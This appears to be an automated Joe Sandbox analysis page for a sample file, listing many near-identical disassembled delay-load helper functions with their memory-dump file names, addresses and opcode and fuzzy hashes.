Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ace21c8c3e6b29145fe9aa36da56f25dd963a086e7ebd3e32bf4ed0c573af2d6
Instruction ID: ae273284e2020264b1091d78fcb4b1a7b8ee686b58683fe402fb2afc4864b8d7
Opcode Fuzzy Hash: ace21c8c3e6b29145fe9aa36da56f25dd963a086e7ebd3e32bf4ed0c573af2d6
Instruction Fuzzy Hash: F3B012E276C002FE31087145BC02D3A225EC8D0F20330C21BB44BC0145D8488C084631

Function 00D6DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b1a240748599e77fa7334ead4a8f54d93609b0142df4ee84de4577978cf8184
Instruction ID: e538cc2573ef73e9a2574fdf7b6c5edce4c375e72b0d61867238e16e8743987d
Opcode Fuzzy Hash: 1b1a240748599e77fa7334ead4a8f54d93609b0142df4ee84de4577978cf8184
Instruction Fuzzy Hash: 64B012D67AC002AE3108711C3C07E76122ED4C0B20330402BB00BC0540DE408C0C8231

Function 00D6DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1380b30ce249a50dd778b1a232570a526bb103230a4eecf2d669f6922e5c5fe2
Instruction ID: 5b3955f8b179d8108c4dd193402b491ad325b96763b8f3104ad6533831a0282a
Opcode Fuzzy Hash: 1380b30ce249a50dd778b1a232570a526bb103230a4eecf2d669f6922e5c5fe2
Instruction Fuzzy Hash: ADB012D67BC107BE320831043C07C77122DC4C0B20330452BB006D4040DE408C4C8131

Function 00D6DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 43ad39ae7831f745f6ad95808611dbbb424cb492ee2955570539ee95d95b0006
Instruction ID: 0e2bbe8f34006eaf23b01442075875c586f37bf2679ab61649b13277d76df408
Opcode Fuzzy Hash: 43ad39ae7831f745f6ad95808611dbbb424cb492ee2955570539ee95d95b0006
Instruction Fuzzy Hash: ECB012D67AC043AE310C71083D07D77122DC5C0B20330801BB10AC4140DE408C098231

Function 00D6DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7130b140cd985bb256b69c8fd18b0cb828e1ffa77cc1cfbf57648104f2bfe5a7
Instruction ID: 2ffeddd9b94576ec08f730842c26660d4aa3a4ff4768504f2728834291fe4cdc
Opcode Fuzzy Hash: 7130b140cd985bb256b69c8fd18b0cb828e1ffa77cc1cfbf57648104f2bfe5a7
Instruction Fuzzy Hash: F5B012D67AC003EE310C71083C07D77123DC4C0B20330811BB40AC5184DE408C0C8231

Function 00D6DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 982e1ee3d739db2ec4a5347fa8a656fe173cd6d311ba8dd2b6891d52c00baa29
Instruction ID: 73dc674ee60b3ef00ae33682fa566f9902299e102d24ca8835feb7a07795577c
Opcode Fuzzy Hash: 982e1ee3d739db2ec4a5347fa8a656fe173cd6d311ba8dd2b6891d52c00baa29
Instruction Fuzzy Hash: A1B012D27AC102BE310871457C03E3F224FD4D0B20330411BB00BC0145D8448C084731

Function 00D6DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2945b1493c01d14449f95b84ecfc3110050ef6d9509f58c6ab95c60d17e09d7d
Instruction ID: d512f3beb7dd538ba83d653d8b9f24778beb87e86263914a149f23821220dee4
Opcode Fuzzy Hash: 2945b1493c01d14449f95b84ecfc3110050ef6d9509f58c6ab95c60d17e09d7d
Instruction Fuzzy Hash: A3B012D6B6C202AE310CB1187C02D76122DC4D9B20330861BF50AD0150DA809C088131

Function 00D6DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1ae2e0522820bf9c99a4b97f9d5ef9c30252b8f704c11dbace70372c17556d7c
Instruction ID: 37dc27b2306fc5a125f6af8b283d17207def0b820409328e0c24d4d8daa305fb
Opcode Fuzzy Hash: 1ae2e0522820bf9c99a4b97f9d5ef9c30252b8f704c11dbace70372c17556d7c
Instruction Fuzzy Hash: 32B012D6B7C302AE310CB1187C02D76122DC4D4B20330451BB10AD0150DA809C088131

Function 00D6DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6abecdb4f42c48e763ee222dfd7f15ab7abc85fa0f79c406039467855375ea00
Instruction ID: 5d621755976eea8dea977047bacc683da84eeebf548696e5ffcce3841342243f
Opcode Fuzzy Hash: 6abecdb4f42c48e763ee222dfd7f15ab7abc85fa0f79c406039467855375ea00
Instruction Fuzzy Hash: 0AB012D6B6C306BE310D71147E02C76122EC5D4B203314A1BB106E0050DA809C489031

Function 00D6D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b93425c219d0552163325a6608d3bf8abeb599e8bfeb8b9758bb16f734293711
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: b93425c219d0552163325a6608d3bf8abeb599e8bfeb8b9758bb16f734293711
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7557d9b3568e2a2679378428b2405fd65f6bb3524e9135a46bc310aab835a176
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 7557d9b3568e2a2679378428b2405fd65f6bb3524e9135a46bc310aab835a176
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 013a99a552b21a099609d5644394330d42a49ad3d07371c1bd3724a32b01f3cf
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 013a99a552b21a099609d5644394330d42a49ad3d07371c1bd3724a32b01f3cf
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b41f7111c08b3eb622295bed60cf1b80f616ca799e810d393339cc6fddfa6195
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: b41f7111c08b3eb622295bed60cf1b80f616ca799e810d393339cc6fddfa6195
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8053e43ac61e74718756c937b166f629d7026ae7bcbd554fc725b461d55de577
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 8053e43ac61e74718756c937b166f629d7026ae7bcbd554fc725b461d55de577
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2af2d6d0d9699c8223723861ccd3cf0dc1ec72e885542d0466a73f6c9edb1d67
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 2af2d6d0d9699c8223723861ccd3cf0dc1ec72e885542d0466a73f6c9edb1d67
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
